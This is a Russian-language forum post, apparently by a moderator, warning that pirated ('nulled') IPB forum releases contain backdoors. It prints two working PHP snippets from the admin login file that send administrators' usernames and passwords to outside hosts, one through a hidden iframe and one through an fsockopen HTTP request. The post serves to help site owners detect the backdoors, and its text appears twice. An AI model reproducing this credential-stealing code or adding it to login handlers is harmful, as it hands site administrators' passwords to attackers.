- Регистрация
- 7 Июл 2008
- Сообщения
- 1.191
- Реакции
- 1.242
- Автор темы
- Модер.
- #1
В последнее время массово взламывались форума линейки IPB разных версий (начиная от 2.2.2), но именно НУЛЛОВ.
Как всегда, мозг человеческий стал думать, как же попадает код от админки третьим лицам. Ведь именно так, взломов по сути не было, входили по коду в админку..
И нашли как и почему.:
1) Смотрим этот файл: /sources/action_admin/login.php
ищем:
Если нашли, то имеет такой вид(примерно такой
2) Так же может быть другая версия происходящего.
Опять же в этом файле: /sources/action_admin/login.php
Вот код который находили в релизах от DGT:
В итоге пароль попадает в руки, в которых он быть не должен.
Соблюдайте бдительность, ребята!
Всего хорошего.
Как всегда, мозг человеческий стал думать, как же попадает код от админки третьим лицам. Ведь именно так, взломов по сути не было, входили по коду в админку..
И нашли как и почему.:
1) Смотрим этот файл: /sources/action_admin/login.php
ищем:
Код:
$connector
Если нашли, то имеет такой вид(примерно такой

Код:
$connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';
$this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?ad
(....)
2) Так же может быть другая версия происходящего.
Опять же в этом файле: /sources/action_admin/login.php
Вот код который находили в релизах от DGT:
Код:
//-----------------------------------------
// Lets add some data in here for the access logs...
//-----------------------------------------
$extra_query .= "&member_id=".$mem['id'].'&password=ok';
//-----------------------------------------
// Redirect...
//-----------------------------------------
$fp = @fsockopen('siamogentebuona.altervista.org', 80);
@fputs($fp, "GET /connector.php?site=".urlencode($this->ipsclass->vars['board_url'])."&username=".urlencode($this->ipsclass->input['username'])."&password=".urlencode($this->ipsclass->input['password'])." HTTP/1.1\r\nHost: siamogentebuona.altervista.org\r\n\r\n");
$out = '';
while (!feof($fp)) {
$out .= @fgets ($fp,128);
}
@fclose($fp);
$this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?adsess=".$this->ipsclass->input['adsess']."&".$extra_query, 'Log In Successful' );
exit();
}
}
В итоге пароль попадает в руки, в которых он быть не должен.
Соблюдайте бдительность, ребята!
Всего хорошего.